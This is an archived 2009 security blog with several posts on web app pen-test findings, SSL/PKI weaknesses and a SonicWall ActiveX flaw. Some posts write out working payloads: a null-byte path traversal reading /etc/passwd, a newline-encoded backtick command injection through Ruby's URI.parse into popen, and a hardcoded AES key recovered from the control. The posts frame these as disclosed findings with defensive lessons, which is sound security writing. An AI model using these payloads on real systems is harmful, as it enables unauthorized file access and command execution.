Friday, October 16, 2009

null byte injection



In this 2008 blog post, Portswigger says that null byte attacks against web applications are nothing new. It's almost 2010, and they're still nothin' new, but they sure can be fun!

During a recent web app assessment, I found one very similar to the example in Portswigger's post. I tampered with it a few times, but wasn't really sure if it was an exploitable condition or not.

I saw some requests containing a file name, similar to:
/servlet?file=image_N.jpg

I began trying some basic attacks, like:
/servlet?file=../../../../etc/passwd

These attacks always resulted in the application cleanly handling the exception, and giving me a friendly error message in a HTTP 200 response. Not quite ready to give up, I decided to try the following:

/servlet?file=../image_N.jpg

This also generated an error, but this time it was a 500 Internal Server Error from the application container. This meant that the validation routine was not necessarily aware of my ../'s, but was probably concerned with the format of the file name. To be sure, I tried the following:

/servlet?file=image_N.foo /servlet?file=../image_N.foo

Both of the above requests generated the clean error message. Only when the string ended with _N.jpg, did I get a 500 error, which told me that the logic was:

1. Validate the file name extension is .JPG.
2. Validate that the file name is of the format image_N, where N is a random integer.
2. Try to read the JPEG from the file system.

This is great if you want to read JPEGs, but I had my heart set on arbitrary file access. So how do we by-pass the _N.JPG filter? I pressed the staples easy button on my desk and it injected a null byte like:

/servlet?file=../../../../etc/passwd%OOimage_N.jpg

After a number of attempts to determine the directory depth of the file system, I was happy to see the contents of the passwd file in my browser.

Then things got interesting . . .

This application had been pen-tested before. It had also been scanned using a popular commercial static analysis tool, and had gotten a clean bill of health. So, let's just say that management was a little, um, curious about why this bug was still alive and well. And by curious, I actually mean furious.

So what went wrong? After the first pen-test, the blatant directory traversal bug was "fixed" with a new validation routine that scrutinized the end of the file name. This new routine was declared a validation routine in the static analysis tool, and any subsequent data flows that passed through it were considered safe. Game over. Hooray for tools!

Lessons Learned

Behind every tool is the person who wrote it, and the person operating it. These people are just as likely to make mistakes as the developer who wrote the target application. Once again, we're reminded that there is no silver security bullet. Tools help, but it comes down to proper education, process, and people to actually find and fix bugs.

Thursday, October 15, 2009

Mainlining new lines: feel the burn

Since the blog has been pretty stale for the last couple of months, I've decided to try and spice things up with a couple of war stories from recent web app pen tests. No XSS bugs here. I'm talking about complete, CPU melting, rack busting pwnage and destruction, shock and awe, all delivered over HTTP. OK, maybe I'm being a little dramatic, but at least they won't be XSS bugs. Besides, if you own the box, who needs XSS?

Command Execution in Ruby on Rails app

This RoR application was accepting a user supplied URL which got passed to an external application via IO.popen(). If I could inject a back-tick or escape from the quoted string being passed to popen(), I could execute arbitrary commands. My problem was that these basic injection attacks were failing because the devs did a decent job of validating input. Part of the validation approach relied on passing the user supplied data to Ruby's URI.parse() function. The parse() function would raise an exception any time I injected a "malicious" character, and the script would stop executing before calling popen().

I knew I had to find some sort of filter bypass bug in URI.parse() if I wanted any pwnage, so I fired up irb and after a few manual fuzzing attempts I had it:

nullbyte:~ mikezusman$ ruby -v
ruby 1.9.1p243 (2009-07-16 revision 24175) [i386-darwin9.8.0]
nullbyte:~ mikezusman$ irb
>> require 'uri'
=> true
>> require 'cgi'
=> true
>> u1 = "http://www.google.com"
=> "http://www.google.com"
>> u2 = "http://www.google.com`ls`"
=> "http://www.google.com`ls`"
>> u3 = "http://www.google.com%0A`ls%0A`"
=> "http://www.google.com%0A`ls%0A`"
>> URI.parse(u1)
=> #

>> URI.parse(u2)
URI::InvalidURIError: bad URI(is not URI?): http://www.google.com`ls`
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:436:in `split'
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:485:in `parse'
from (irb):7
from :0
>> URI.parse(u3)
URI::InvalidURIError: bad URI(is not URI?): http://www.google.com%0A`ls%0A`
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:436:in `split'
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:485:in `parse'
from (irb):8
from :0
>> URI.parse(CGI::unescape(u3))
=> #

>> x = URI.parse(CGI::unescape(u3))
=> #


Injecting a URL encoded version (%0A) of a new line (\n) would get my URL encoded back-tick (%60) through the URI.parse() function unscathed. After the successful call to parse(), the data was passed to popen() and my commands would be executed. My attack looked like: http://victim.com/controller?param=http://www.google.com%0A%60ls%0A%60

Lessons Learned

Relying on the result of a call to a third party routine doesn't necessarily equate to "input validation." However, used differently, URI.parse() could have very easily helped to prevent this bug. URI.parse() returns a new object whose members could be used to construct a safe string to be passed to popen().
This would work because everything after the %0A gets dropped:

>> d = "http://www.google.com/%0A%60ls%0A%60"
=> "http://www.google.com/%0A%60ls%0A%60"
>> r = URI.parse(CGI::unescape(d))
=> #

>> r.path
=> "/"
>> new_arg = "#{r.scheme}://#{r.host}#{r.path}"
=> "http://www.google.com/"


If you relied on the above as "input validation", you just would have gotten lucky that the function chopped off everything after the new line. Some times luck is enough. But when dealing with user data being passed to a system command, a little extra scrutiny can go a long way towards protecting your application. URI.parse() makes it easier for us to enforce additional validation checks by letting us look at each piece of the URI (protocol/scheme, host, path).

When fetching user supplied URI's, this sort of fine grained input validation is something we should be doing anyway. For example, simply parsing the URI would not block an attack against the local host, since http://127.0.0.1/ is valid. We might also want to make sure that the protocol is http|https (not ftp, for example) and that our application isn't being used to scan the network on the inside of the firewall (by blacklisting internal IPs and host names).

Moral of the Story

Just like many other bugs, this one could have been prevented with better input validation. Even if you think you're doing a good job validating your input, remember that not all input validation routines are created equal. Stay tuned for my next post, where we'll explore the short comings of relying on static analysis tools to catch similar bugs.

Update 10/22/2009
@emerose filed this bug report.

Tuesday, August 4, 2009

BlackHat 2009 and Defcon 17: EV SSL MITM Demo

For the second year in a row I had BlackHat live demo issues. Shame on me.

Fortunately, the demo worked at Defcon. Had it not worked, however, I was prepared with a video thanks to Camtasia.

You can view the video here.

The demonstration shows a MITM using a regular SSL certificate (Domain Validated) to intercept data sent to a site protected with an Extended Validation (EV) SSL certificate. Since the browser treats the high-assurance EV certificate the same as a low-assurance DV certificate, the user is never warned about any connection downgrade. All they might notice is the "flicker" of the green EV badge.

Tuesday, June 16, 2009

Insecure Cookies and You: Perfect Together

Who uses the secure cookie flag? Web developers who don't want their user's cookies being leaked out over non-SSL protected sockets. These developers realize that protecting user credentials on the wire is only half the battle. If an attacker can sniff a user's cookie off the wire when it's sent in plain text, who cares if the credentials are protected? The attacker still gets access to the application.

Who doesn't use the secure flag? Yahoo! Mail. Microsoft Live Mail. GMail and Google apps. All of these sites, and many others, protect the transmission of credentials using HTTPS. Unfortunately, immediately after you authenticate to one of these sites and get a valid session cookie, the browser is redirected to a plain text HTTP interface of the site. Google at least gives users the option of protecting their entire session with SSL. Others do not. If these companies start setting the secure flag on their cookies, their sites will break.

The "Secure" cookie flag is just a patch for a poorly implemented browser Same Origin Policy. Essentially, it allows a web application to opt-in to a strict interpretation of SOP on the client side that will prevent cookies from being leaked over insecure protocols. Why do we have to do extra work to be secure?

I propose a new cookie flag, called the "insecure" flag. Use of the insecure flag would allow web sites that don't care about protecting session cookies to opt-out of a strict interpretation of SOP, thus exposing their session cookies to the world and allowing their applications to work. If you want to protect your users' credentials over HTTPS, but then expose their sessions over HTTP, this will be the flag for you!

Imagine that. Secure by default. No extra work to do things right. What a concept!

Ah, wishful thinking :-)

Wednesday, June 3, 2009

NYS CSCIC Conference

Last week I presented at the NYS cyber security conference in Albany. My talk was about attacks that leverage publicly available information, such as data indexed in search engines and/or stored in social networks. I also showed how this data can be used in highly targeted spear phishing attacks. My spear phishing demo used my netextender ssl vpn exploit, since it is usually trivial to find a companies SSL VPN gateway. Once you find the ssl vpn gateway, some passive recon of the system can reveal a tremendous attack surface on the victim (client) machine.

At the end, I touched on some problems with commercial PKI, but I didn't really get into it. I'm saving that for some up coming blog posts. I got some great feedback at the end, and also met a bunch of cool folks. Thanks for listening. Slides are available here.

I couldn't stick around for both days of talks, but I managed to see the two key notes on day one. The second one was by Phil Reitinger, Deputy Under Secretary, National Protection and Programs Directorate (NPPD) U.S. Department of Homeland Security.

/me lets his fingers recover from typing that title

During his talk, Mr. Reitinger offered up five priorities for the US as we move forward with our new cyber security initiatives. I'm paraphrasing here, and I didn't take great notes. That's because I'm just some dude with a blog, and not a journalist.

1. We need to build our capacity. DHS needs people. We also need to work with academia to build programs that churn out people with the right skills and knowledge.

2. Establish relationships between public and private sector. Mr. Reitinger joked about the infinite loop of meetings where public & private sector folks agree that they are both willing to share data - starting at the next meeting.

3. Develop (and follow) a standard incident response & recovery plan.

4. Streamline Identity Management. In addition to managing user identities, he also mentioned something to the effect of "being able to better identify who we're connecting to." Maybe this means we'll eventually get something better than SSL site validation.

5. Metrics. Specifically, he mentioned software quality metrics. One thing that keeps popping into my head is the fact that the airforce got a locked-down version of XP. How did the air force quantify the improved security? And when will everyone else benefit?

Tuesday, March 24, 2009

Subprime PKI and SSL Rebinding

I'm on my way out of Vancouver today after an awesome time at CanSecWest 2009. Met alot of awesome people, and learned some cool new tech.

The talk Alex and I gave, "Subprime PKI: EV SSL certs and MD5 Collisions", was also well received. We'll be releasing our paper and source code soon, but until then, here is a screen shot of a MITM attack against an EV SSL protected web site from our live demo (note the presence of the "green glow" in the browser).

Thanks to Garett Gee for the photo. You can check out the rest of his photos here.

Thursday, February 26, 2009

Law.Com SSL VPN Article and Microsoft IAG Hands On Lab

Today I'm out to teach a Microsoft IAG Hands-On-Lab outside of Boston, Mass. It is a basic intro class to IAG, which is Microsoft's SSL VPN technology.

Also, last month Bryan Dykstra wrote a follow up article about my SSL VPN research on Law.com. It's a good read, and provides a nice overview of some of the threats effecting these devices.

Monday, February 23, 2009

Reversing Crypto: SonicWall SSL VPN Flaw

Haroon Meer's SSL VPN ActiveX repurposing attack is number 9 on Jeremiah Grossmans list of the top 10 web hacks of 2008 :-) Congrats to Haroon! I figured this would be a good time to document the details of the Sonicwall flaw I discovered and disclosed last year at blackhat. Some details are in the slides, but I've been meaning to put a detailed description here for some time. So here goes...

In the beginning, there was a flaw...

First, the initial flaw was VERY simple, and easy to exploit. Any web site could instantiate the ActiveX control (NELaunchCtrl), and the very first thing the control would do is send an HTTP request to the invoking server to determine if the control should upgrade itself. If the server sent back an unrecognized response, the control would download an unsigned .EXE file from the server, and execute it on the client. Very basic, and easy to exploit. To find the flaw, you simply had to intercept the ActiveX initiated HTTP requests with an SSL capable proxy, then replay and fuzz them.

This flaw was reported to SonicWALL (with recommendation of using code signing certificates to prevent malicious code execution), and they eventually released a patch for me to test. This is when it got interesting.

Then, there was a patch...

Upon initial testing of the fixed control, the very basic repurposing attack was indeed thwarted. Further interception of the traffic generated by the control showed a series of challenge/response requests between the client and the server.

Example challenge:
https://sslvpn.server.com/cgi-bin/sslvpnclient?validateserver=128248573387261264

Example response (from HTTP response body):
SERVER_CHAIN="NjQ3MjZGNkM2OTZENkY2NzZGNjQ3MjY5NjM3MjYxNzM=";

VALIDATE_DATA="NEQ2NUQ1MzcwNDNBODhDRUFBMDgwMzMxNjAzRDhGQ0U4MDczRjQxOTNGQTdDODgzRUQ5RDdBQTAzQjg3QURFQg==";

Base64 decoding of the VALIDATE_DATA yielded binary data that had to be some sort of cipher text. SERVER_CHAIN, on the other hand, would reveal a stream of hex numbers, that would eventually decode to a 16byte string such as: drolimogodricras

These 16bytes were unique for each validation request, as was the cipher text. Also interesting was the fact that the SERVER_CHAIN and VALIDATE_DATA were unique even when I replayed requests with the same value passed in validateserver.

At this point I knew I was dealing with a stream or block cipher, that SERVER_CHAIN what seemed to be an Initialization Vector, and VALIDATE_DATA held what seemed to be the cipher text. Now I just needed to find out what algorithm was being used and what the encryption key was.

No IDA Skills Required

Next, I started looking at the control itself. I knew there was a new method exposed named ValidateServer(). This method had to be called for the control to continue running, and this is also what triggered the challenge response. Before I jumped into IDA, I ran strings.exe on the binary. Below is what I saw.



In the above image is a red circle, and a red square. The red circle shows the following text: s)3!cW^L1%S&V@N~
It doesn't take much to realize that these 16bytes look an awful lot like a passphrase.

In the red box, we see some encryption related error messages that indicate the encryption method: AES128. For AES128, our 16byte string above would be an acceptable passphrase. Remember that 16byte string we assumed was an IV? Well, 16 bytes is the correct size for anAES128 IV.

Now we've identified all the key parts of the new server validation mechanism SonicWall implemented to attempt to defeat the repurposing of their ActiveX client by rogue sites.

1. The input is a unix time stamp generated by the client, and sent to the server for encrypting.
2. The server generates a pseudo-random IV and encrypts the timestamp with a symmetric encryption key that client already knows. The IV and cipher text are sent back to the client.
3. The client receives the IV and the ciphertext, and attempts to decrypt the cipher using the hardcoded, pre-shared encryption key.
4. If the decrypted plaintext matches what was originally sent by the client, validation succeeds and the control can be used (or attacked.)

The Source Code

To repeat the repurposing attack, I wrote the following C# and ran it on my rogue server. Sorry for the screenshot, but I can't find the actual source file at the moment.



At least they didn't use ECB ;-)

Conclusion

For a second time, I reported everything above to SonicWall. They patched again, and said they fixed it. However, the fix did not include the recommended mitigation of using code signing certificates to validate the .EXE that gets downloaded by the ActiveX. That said, the control still relies on some sort of obfuscated client/server validation routine. That's bad news, since it can probably be broken again by someone with enough time on their hands. But then again, I wonder if they would have gotten a code signing certificate signed with an MD5 hash ;-) Security through obscurity FT(L|W)?

Monday, January 26, 2009

Top Web Hacking Techniques of 2008

Jeremiah has put out a request for the top web hacking techniques of 2008. This post serves to summarize my suggestion, which is ActiveX Repurposing attacks. These are attacks where malicious web sites abuse the functionality of ActiveX objects already installed on Windows machines, in order to download and execute code (among other things). No debugger necessary :-)

References:

1. An ActiveX Dropper described by Dean: Owning the Client without an Exploit

2. Sensepost Juniper SSL VPN ActiveX repurposing by Haroon: ActiveX Repurposing.. (aka: Other bugs your static analyzer will never find..) (aka 0day^H^H 485day bug!)

3. SonicWALL SSL VPN ActiveX repurposing by yours truly: Network World article
and SonicWALL announcement.

4. Hmm, I thought this was more recent, but it was actually from 2005 (read down in the wiki): Sony DRM Root Kit Scandal

Thursday, January 15, 2009

How do you trust?

SSL PKI is designed to do two things: encrypt data on the wire, and allow web site validation through the use of trusted third party signatures. The former works pretty well, the Debian weak key debacle aside. Unfortunately, the latter seems about as robust and secure as Windows 98. Case in point, https://discovercard.com. As my colleague Mike Walker points out, DiscoverCard.com forces users to enter credentials on a page served over an insecure HTTP connection. In doing so, Discover leaves users with no real way to tell who they are giving their credentials to. This is a perfect example of an implementation specific design flaw that fails open and renders SSL site validation useless.

Unfortunately, Discover Card isn't the only organization breaking PKI. The pillars of Internet security, our trusted third party Certificate Authorities, have been having a rough time recently. A number of implementation specific flaws at multiple CAs have allowed outsiders to abuse their systems and obtain certificates for which they are not authorized to hold. Sure, these implementation specific flaws can be fixed, but the lasting damage to the trust we have in PKI can't be undone. Further, the way PKI has been handling these situations seems to further undermine whatever trust remains.

Last summer when I disclosed the details of how I got the live.com certificate to Microsoft, I told them I wasn't going to do anything bad with it, they said thanks, we shook hands, and that was pretty much the end of it. A few weeks ago, when Sotirov and crew disclosed that they derived their very own key capable of signing certificates that would be trusted by all web browsers, the researchers told Microsoft, Mozilla, etc, that they wouldn't do anything bad with it. These companies again said thanks, hands were shook, and that was pretty much the end of that.

We rely on WebTrust audits and other mechanisms to ensure that our commercial Certificate Authorities do their job well, and so we can be sure we're sending our data to the web sites we trust. Unfortunately, when the audits are useless and the Certificate Authorities screw up like they did in the above two scenarios, companies like Microsoft and Mozilla are forced to make a tough call:

Do they
a) Revoke the root CA for which a duplicate signing key was derived by unknown individuals, thus breaking the Internet for many businesses and individual users
or
b) Do nothing and trust that these guys really only have an expired certificate, and didn't generate one valid for the next couple of years since they so very easily could have.

In the end, the trust that backs PKI is replaced with the trust of a few select individuals at the organizations who manage our root certificate programs (a.k.a the browser vendors). The millions of dollars spent on web trust audits are meaningless. The CAs could have just paid all of their money earmarked for audits to Sotirov and Appelbaum in exchange for their silence, and PKI would lived to fall another day.

Burn your SSL Certificates?

PKI, while good on paper, is hard to implement securely. It has taken almost two decades for us to have web browsers that actually support the one method that PKI has to protect itself from rogue certificates: Certificate Revocation Lists. And it doesn't really matter, since not everyone is using IE7 or Firefox 3 yet. CRLs, which are essentially blacklists, are completely ineffective when you don't even know what rogue certificates are actually in existence.

I don't think trusted third parties are enough. We need technology that puts the ability to make trust decisions back in the hands of end users, rather than trying to make these decisions for them.

So what can we do differently? I'm of the mindset that client side certificate / public key caching, like that of SSH, can drastically improve our ability to make trust decisions when communicating on the Internet. SSH shows us that we can communicate securely without trusted third parties. The next question is how best to apply this to web browsers. Hashes of public keys are not easily consumed by casual Internet users. Another Intrepidus colleague, Aaron Rhodes, brought up the idea of vanity hashes that are actually easily recognizable patterns. This could help, but it would certainly complicate key management.

In an effort to actually try and help make things better, rather than just ranting about how bad PKI is on this blog, I've actually been working on a plug-in for Firefox that lets users white list SSL public keys SSH style and alerts the user when they change. It is actually alot harder than it would seem. In my next post, I'll talk more about this plug-in, and the challenges I've faced in getting it working.

-schmoilito

(Cross post on blog.phishme.com)

Friday, January 2, 2009

A brief description of how to become a CA

Anyone can create a Certificate Authority. Check out this blog describing how to do it with OpenSSL.

Becoming a trusted CA is a different story. Microsoft, Mozilla, Apple, and other browser companies and OS vendors have a policy stating what it takes to participate in their root CA programs.

http://technet.microsoft.com/en-us/library/cc751157.aspx
http://www.apple.com/certificateauthority/ca_program.html
http://www.mozilla.org/projects/security/certs/policy/
http://www.opera.com/docs/ca/

Thursday, January 1, 2009

Nobody is perfect

Just before Christmas, an admin from StartCom certificate authority disclosed that he was able to procure an SSL certificate for Mozilla.com from a registered agent of the CA Comodo. He was not authorized to obtain this certificate, and the RA and CA clearly failed to properly vette his cert signing request. Shame on Comodo. You can read the entire saga on mozilla.dev.tech.crypto.

The discussion resulting from StartComs blog post is quite interesting, and touches on many issues spanning from internal CA domain validation procedures, to how to revoke a certificate in the Mozilla root cert program. One issue in particular, is exactly what I talked about in my last post.

Frank Hecker, of the Mozilla Foundation, said "[right] now we have no real idea as to the extent of the problem (e.g., how many certs might have been issued without proper validation, how many of those were issued to malicious actors, etc.)."

When a flaw in a CA validation mechanism is uncovered, it can sometimes be trivial to fix. The hard part is determining if any other certificates were obtained by taking advantage of the same flaw, and then revoke them. Although I can imagine a methodology for this process, I can't comment on how any given CA would actually tackle this problem. Based on my own application security experience, I will say that I'm sure lots of logs that would need to be parsed, might not actually exist.

One person who commented on the StartCom post that started this all critiqued the post by saying it seemed dodgy that StartCom was blatantly pointing out flaws in a competing CA. The reader did, however, understand the severity of the problem that was found and thanked StartCom for publicly disclosing it. I agree with the reader, and I think StartCom did a good thing in disclosing this bug.

So in the interest of full-disclosure, here is what happened on Friday December 19 (three days before the StartCom disclosure). I found a flaw in StartCom's domain validation mechanism that easily allowed anyone to authorize themselves for ANY domain name, on various .TLDs. While I only tested .COM, many other TLDs were available including .GOV.
The screen shot above shows the domain names my StartCom account was allowed to create signed certificates for. These certificates would have been trusted by Firefox, but not Internet Explorer. The first one is a domain I control. Phishme.com and Intrepidusgroup.com are domains owned by my employer for which I am not an authorized contact, and for which I should not have been, but was, granted a signed certificate. Needless to say Paypal.com and Verisign.com are companies I'm also not authorized for.

Fortunately for Verisign and PayPal, a defense in-depth strategy succeeded for StartCom. While I by-passed StartComs domain validation process, my attempts to create a signed certificate for Verisign.com was flagged by a black-list and not permitted. This is good news for the prominent sites on the black-list, but bad news for lesser known sites that rely on the trust gained by having a valid SSL certificate (small credit unions, for example).

Because they're a good CA, the StartCom team was immediately aware of my attempt to get a certificate for Verisign. I disclosed the details of the flaw to them, and the simple problem was fixed within hours. But the question remains: did anyone else take advantage of the flaw?

PKI is not a perfect system, and there is no perfect CA. But, there are at least two types of CAs. One type treats SSL certificates as a cash cow, pushing signed certificates out the door, and counting the money. The second type is like StartCom. This second type understands that trust comes before money and that trusted CAs are a critical piece of Internet infrastructure.

(cross post on PhishMe)